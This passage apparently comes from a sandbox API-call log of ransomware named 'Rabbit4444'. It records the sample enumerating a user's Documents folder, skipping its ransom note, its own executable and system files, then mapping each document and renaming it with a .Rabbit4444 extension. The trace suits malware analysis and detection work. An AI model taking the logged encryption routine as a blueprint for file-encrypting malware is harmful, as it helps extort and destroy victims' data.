lstrcmpiW (lpString1="35ULey8kyqPR4IR.pps", lpString2="pagefile.sys") returned -1 [0049.477] lstrcmpiW (lpString1="35ULey8kyqPR4IR.pps", lpString2="boot") returned -1 [0049.478] lstrcmpiW (lpString1="35ULey8kyqPR4IR.pps", lpString2="ids.txt") returned -1 [0049.478] lstrcmpiW (lpString1="35ULey8kyqPR4IR.pps", lpString2="NTUSER.DAT") returned -1 [0049.478] lstrcpyW (in: lpString1=0x130eb6c, lpString2="35ULey8kyqPR4IR.pps" | out: lpString1="35ULey8kyqPR4IR.pps") returned="35ULey8kyqPR4IR.pps" [0049.478] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\35ULey8kyqPR4IR.pps", dwFileAttributes=0x0) returned 1 [0049.478] lstrlenW (lpString="35ULey8kyqPR4IR.pps") returned 19 [0049.478] lstrlenW (lpString="Rabbit4444") returned 10 [0049.478] lstrcmpiW (lpString1="qPR4IR.pps", lpString2="Rabbit4444") returned -1 [0049.478] lstrlenW (lpString=".dll") returned 4 [0049.478] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0049.478] lstrlenW (lpString=".lnk") returned 4 [0049.478] lstrcmpiW (lpString1=".pps", lpString2=".lnk") returned 1 [0049.478] lstrlenW (lpString=".ini") returned 4 [0049.478] lstrcmpiW (lpString1=".pps", lpString2=".ini") returned 1 [0049.478] lstrlenW (lpString=".sys") returned 4 [0049.478] lstrcmpiW (lpString1=".pps", lpString2=".sys") returned -1 [0049.478] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\35ULey8kyqPR4IR.pps" (normalized: "c:\\users\\fd1hvy\\documents\\35uley8kyqpr4ir.pps"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.478] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.478] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14078898333) returned 1 [0049.478] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=57988) returned 1 [0049.478] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0049.478] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0049.478] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe590, lpName=0x0) returned 0x298 [0049.479] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe590) returned 0x70000 [0049.480] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.480] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0049.480] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.480] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0049.480] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.480] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0049.480] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.480] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0049.480] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14079126007) returned 1 [0049.481] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0049.481] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0049.481] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.481] CloseHandle (hObject=0x298) returned 1 [0049.481] CloseHandle (hObject=0x278) returned 1 [0049.482] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\35ULey8kyqPR4IR.pps.Rabbit4444") returned 56 [0049.482] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\35ULey8kyqPR4IR.pps" (normalized: "c:\\users\\fd1hvy\\documents\\35uley8kyqpr4ir.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\35ULey8kyqPR4IR.pps.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\35uley8kyqpr4ir.pps.rabbit4444"), dwFlags=0x1) returned 1 [0049.482] InterlockedExchangeAdd (in: Addend=0xff618, Value=58000 | out: Addend=0xff618) returned 21335840 [0049.482] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3588 [0049.483] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd6799a0, ftCreationTime.dwHighDateTime=0x1d4d653, ftLastAccessTime.dwLowDateTime=0xf2a82150, ftLastAccessTime.dwHighDateTime=0x1d4d10a, ftLastWriteTime.dwLowDateTime=0xf2a82150, ftLastWriteTime.dwHighDateTime=0x1d4d10a, nFileSizeHigh=0x0, nFileSizeLow=0x13a3c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3nYDBBYQqc5.pptx", cAlternateFileName="3NYDBB~1.PPT")) returned 1 [0049.483] lstrcmpiW (lpString1="3nYDBBYQqc5.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.483] lstrcmpiW (lpString1="3nYDBBYQqc5.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.483] lstrcmpiW (lpString1="3nYDBBYQqc5.pptx", lpString2="Rabbit4444.exe") returned -1 [0049.483] lstrcmpiW (lpString1="3nYDBBYQqc5.pptx", lpString2=".") returned 1 [0049.483] lstrcmpiW (lpString1="3nYDBBYQqc5.pptx", lpString2="..") returned 1 [0049.483] lstrcmpiW (lpString1="3nYDBBYQqc5.pptx", lpString2="windows") returned -1 [0049.483] lstrcmpiW (lpString1="3nYDBBYQqc5.pptx", lpString2="bootmgr") returned -1 [0049.483] lstrcmpiW (lpString1="3nYDBBYQqc5.pptx", lpString2="pagefile.sys") returned -1 [0049.483] lstrcmpiW (lpString1="3nYDBBYQqc5.pptx", lpString2="boot") returned -1 [0049.483] lstrcmpiW (lpString1="3nYDBBYQqc5.pptx", lpString2="ids.txt") returned -1 [0049.483] lstrcmpiW (lpString1="3nYDBBYQqc5.pptx", lpString2="NTUSER.DAT") returned -1 [0049.483] lstrcpyW (in: lpString1=0x130eb6c, lpString2="3nYDBBYQqc5.pptx" | out: lpString1="3nYDBBYQqc5.pptx") returned="3nYDBBYQqc5.pptx" [0049.483] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\3nYDBBYQqc5.pptx", dwFileAttributes=0x0) returned 1 [0049.483] lstrlenW (lpString="3nYDBBYQqc5.pptx") returned 16 [0049.483] lstrlenW (lpString="Rabbit4444") returned 10 [0049.483] lstrcmpiW (lpString1="YQqc5.pptx", lpString2="Rabbit4444") returned 1 [0049.483] lstrlenW (lpString=".dll") returned 4 [0049.483] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0049.483] lstrlenW (lpString=".lnk") returned 4 [0049.483] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0049.483] lstrlenW (lpString=".ini") returned 4 [0049.483] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0049.483] lstrlenW (lpString=".sys") returned 4 [0049.483] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0049.483] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\3nYDBBYQqc5.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\3nydbbyqqc5.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.484] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.484] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14079432656) returned 1 [0049.484] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=80444) returned 1 [0049.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0049.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0049.484] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13d40, lpName=0x0) returned 0x298 [0049.484] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13d40) returned 0x70000 [0049.486] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.486] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.486] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.486] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.486] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14079705346) returned 1 [0049.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0049.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0049.486] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.487] CloseHandle (hObject=0x298) returned 1 [0049.487] CloseHandle (hObject=0x278) returned 1 [0049.488] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\3nYDBBYQqc5.pptx.Rabbit4444") returned 53 [0049.488] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\3nYDBBYQqc5.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\3nydbbyqqc5.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\3nYDBBYQqc5.pptx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\3nydbbyqqc5.pptx.rabbit4444"), dwFlags=0x1) returned 1 [0049.488] InterlockedExchangeAdd (in: Addend=0xff618, Value=80448 | out: Addend=0xff618) returned 21393840 [0049.488] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3590 [0049.488] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77ffd710, ftCreationTime.dwHighDateTime=0x1d4cf91, ftLastAccessTime.dwLowDateTime=0xc7c8cad0, ftLastAccessTime.dwHighDateTime=0x1d4ce8e, ftLastWriteTime.dwLowDateTime=0xc7c8cad0, ftLastWriteTime.dwHighDateTime=0x1d4ce8e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="49_hdOHrBSo9", cAlternateFileName="49_HDO~1")) returned 1 [0049.488] lstrcmpiW (lpString1="49_hdOHrBSo9", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.488] lstrcmpiW (lpString1="49_hdOHrBSo9", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.488] lstrcmpiW (lpString1="49_hdOHrBSo9", lpString2="Rabbit4444.exe") returned -1 [0049.488] lstrcmpiW (lpString1="49_hdOHrBSo9", lpString2=".") returned 1 [0049.489] lstrcmpiW (lpString1="49_hdOHrBSo9", lpString2="..") returned 1 [0049.489] lstrcmpiW (lpString1="49_hdOHrBSo9", lpString2="windows") returned -1 [0049.489] lstrcmpiW (lpString1="49_hdOHrBSo9", lpString2="bootmgr") returned -1 [0049.489] lstrcmpiW (lpString1="49_hdOHrBSo9", lpString2="pagefile.sys") returned -1 [0049.489] lstrcmpiW (lpString1="49_hdOHrBSo9", lpString2="boot") returned -1 [0049.489] lstrcmpiW (lpString1="49_hdOHrBSo9", lpString2="ids.txt") returned -1 [0049.489] lstrcmpiW (lpString1="49_hdOHrBSo9", lpString2="NTUSER.DAT") returned -1 [0049.489] lstrcpyW (in: lpString1=0x130eb6c, lpString2="49_hdOHrBSo9" | out: lpString1="49_hdOHrBSo9") returned="49_hdOHrBSo9" [0049.489] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6668 [0049.489] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x4e) returned 0x10cd98 [0049.489] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6670 | out: ListHead=0xf68b0, ListEntry=0xf6670) returned 0xf6370 [0049.489] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82052b60, ftCreationTime.dwHighDateTime=0x1d4c876, ftLastAccessTime.dwLowDateTime=0x6dc61780, ftLastAccessTime.dwHighDateTime=0x1d4d2d6, ftLastWriteTime.dwLowDateTime=0x6dc61780, ftLastWriteTime.dwHighDateTime=0x1d4d2d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6XPv", cAlternateFileName="")) returned 1 [0049.489] lstrcmpiW (lpString1="6XPv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.489] lstrcmpiW (lpString1="6XPv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.489] lstrcmpiW (lpString1="6XPv", lpString2="Rabbit4444.exe") returned -1 [0049.489] lstrcmpiW (lpString1="6XPv", lpString2=".") returned 1 [0049.489] lstrcmpiW (lpString1="6XPv", lpString2="..") returned 1 [0049.489] lstrcmpiW (lpString1="6XPv", lpString2="windows") returned -1 [0049.489] lstrcmpiW (lpString1="6XPv", lpString2="bootmgr") returned -1 [0049.489] lstrcmpiW (lpString1="6XPv", lpString2="pagefile.sys") returned -1 [0049.489] lstrcmpiW (lpString1="6XPv", lpString2="boot") returned -1 [0049.489] lstrcmpiW (lpString1="6XPv", lpString2="ids.txt") returned -1 [0049.489] lstrcmpiW (lpString1="6XPv", lpString2="NTUSER.DAT") returned -1 [0049.489] lstrcpyW (in: lpString1=0x130eb6c, lpString2="6XPv" | out: lpString1="6XPv") returned="6XPv" [0049.489] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0049.489] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x3e) returned 0x114f28 [0049.489] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6670 [0049.489] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c9e1a60, ftCreationTime.dwHighDateTime=0x1d4c907, ftLastAccessTime.dwLowDateTime=0x72df7630, ftLastAccessTime.dwHighDateTime=0x1d4d09c, ftLastWriteTime.dwLowDateTime=0x72df7630, ftLastWriteTime.dwHighDateTime=0x1d4d09c, nFileSizeHigh=0x0, nFileSizeLow=0x877f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7YrvN5qTysy.pptx", cAlternateFileName="7YRVN5~1.PPT")) returned 1 [0049.489] lstrcmpiW (lpString1="7YrvN5qTysy.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.489] lstrcmpiW (lpString1="7YrvN5qTysy.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.489] lstrcmpiW (lpString1="7YrvN5qTysy.pptx", lpString2="Rabbit4444.exe") returned -1 [0049.489] lstrcmpiW (lpString1="7YrvN5qTysy.pptx", lpString2=".") returned 1 [0049.489] lstrcmpiW (lpString1="7YrvN5qTysy.pptx", lpString2="..") returned 1 [0049.489] lstrcmpiW (lpString1="7YrvN5qTysy.pptx", lpString2="windows") returned -1 [0049.489] lstrcmpiW (lpString1="7YrvN5qTysy.pptx", lpString2="bootmgr") returned -1 [0049.490] lstrcmpiW (lpString1="7YrvN5qTysy.pptx", lpString2="pagefile.sys") returned -1 [0049.490] lstrcmpiW (lpString1="7YrvN5qTysy.pptx", lpString2="boot") returned -1 [0049.490] lstrcmpiW (lpString1="7YrvN5qTysy.pptx", lpString2="ids.txt") returned -1 [0049.490] lstrcmpiW (lpString1="7YrvN5qTysy.pptx", lpString2="NTUSER.DAT") returned -1 [0049.490] lstrcpyW (in: lpString1=0x130eb6c, lpString2="7YrvN5qTysy.pptx" | out: lpString1="7YrvN5qTysy.pptx") returned="7YrvN5qTysy.pptx" [0049.490] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7YrvN5qTysy.pptx", dwFileAttributes=0x0) returned 1 [0049.490] lstrlenW (lpString="7YrvN5qTysy.pptx") returned 16 [0049.490] lstrlenW (lpString="Rabbit4444") returned 10 [0049.490] lstrcmpiW (lpString1="qTysy.pptx", lpString2="Rabbit4444") returned -1 [0049.490] lstrlenW (lpString=".dll") returned 4 [0049.490] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0049.490] lstrlenW (lpString=".lnk") returned 4 [0049.490] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0049.490] lstrlenW (lpString=".ini") returned 4 [0049.490] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0049.490] lstrlenW (lpString=".sys") returned 4 [0049.490] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0049.490] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7YrvN5qTysy.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\7yrvn5qtysy.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.490] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.490] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14080107002) returned 1 [0049.490] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=34687) returned 1 [0049.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0049.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0049.490] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8a80, lpName=0x0) returned 0x298 [0049.491] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8a80) returned 0x70000 [0049.492] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.492] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.492] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.492] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.492] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14080289732) returned 1 [0049.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0049.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0049.492] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.493] CloseHandle (hObject=0x298) returned 1 [0049.493] CloseHandle (hObject=0x278) returned 1 [0049.493] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\7YrvN5qTysy.pptx.Rabbit4444") returned 53 [0049.493] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\7YrvN5qTysy.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\7yrvn5qtysy.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\7YrvN5qTysy.pptx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\7yrvn5qtysy.pptx.rabbit4444"), dwFlags=0x1) returned 1 [0049.494] InterlockedExchangeAdd (in: Addend=0xff618, Value=34688 | out: Addend=0xff618) returned 21474288 [0049.494] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3592 [0049.494] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaaa7b240, ftCreationTime.dwHighDateTime=0x1d5057f, ftLastAccessTime.dwLowDateTime=0x98516dc0, ftLastAccessTime.dwHighDateTime=0x1d507eb, ftLastWriteTime.dwLowDateTime=0x98516dc0, ftLastWriteTime.dwHighDateTime=0x1d507eb, nFileSizeHigh=0x0, nFileSizeLow=0x2f59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bt9IDQZ.docx", cAlternateFileName="BT9IDQ~1.DOC")) returned 1 [0049.494] lstrcmpiW (lpString1="bt9IDQZ.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.494] lstrcmpiW (lpString1="bt9IDQZ.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.494] lstrcmpiW (lpString1="bt9IDQZ.docx", lpString2="Rabbit4444.exe") returned -1 [0049.494] lstrcmpiW (lpString1="bt9IDQZ.docx", lpString2=".") returned 1 [0049.494] lstrcmpiW (lpString1="bt9IDQZ.docx", lpString2="..") returned 1 [0049.494] lstrcmpiW (lpString1="bt9IDQZ.docx", lpString2="windows") returned -1 [0049.494] lstrcmpiW (lpString1="bt9IDQZ.docx", lpString2="bootmgr") returned 1 [0049.494] lstrcmpiW (lpString1="bt9IDQZ.docx", lpString2="pagefile.sys") returned -1 [0049.494] lstrcmpiW (lpString1="bt9IDQZ.docx", lpString2="boot") returned 1 [0049.494] lstrcmpiW (lpString1="bt9IDQZ.docx", lpString2="ids.txt") returned -1 [0049.494] lstrcmpiW (lpString1="bt9IDQZ.docx", lpString2="NTUSER.DAT") returned -1 [0049.494] lstrcpyW (in: lpString1=0x130eb6c, lpString2="bt9IDQZ.docx" | out: lpString1="bt9IDQZ.docx") returned="bt9IDQZ.docx" [0049.494] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bt9IDQZ.docx", dwFileAttributes=0x0) returned 1 [0049.494] lstrlenW (lpString="bt9IDQZ.docx") returned 12 [0049.494] lstrlenW (lpString="Rabbit4444") returned 10 [0049.494] lstrcmpiW (lpString1="9IDQZ.docx", lpString2="Rabbit4444") returned -1 [0049.495] lstrlenW (lpString=".dll") returned 4 [0049.495] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0049.495] lstrlenW (lpString=".lnk") returned 4 [0049.495] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0049.495] lstrlenW (lpString=".ini") returned 4 [0049.495] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0049.495] lstrlenW (lpString=".sys") returned 4 [0049.495] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0049.495] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bt9IDQZ.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bt9idqz.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.495] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.495] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14080563508) returned 1 [0049.495] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=12121) returned 1 [0049.495] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0049.495] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0049.495] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3260, lpName=0x0) returned 0x298 [0049.495] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3260) returned 0x70000 [0049.496] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.496] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.496] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0049.496] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.497] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0049.497] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.497] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.497] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14080747299) returned 1 [0049.497] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0049.497] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0049.497] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.497] CloseHandle (hObject=0x298) returned 1 [0049.497] CloseHandle (hObject=0x278) returned 1 [0049.498] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bt9IDQZ.docx.Rabbit4444") returned 49 [0049.498] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bt9IDQZ.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bt9idqz.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bt9IDQZ.docx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\bt9idqz.docx.rabbit4444"), dwFlags=0x1) returned 1 [0049.498] InterlockedExchangeAdd (in: Addend=0xff618, Value=12128 | out: Addend=0xff618) returned 21508976 [0049.498] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3593 [0049.498] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, 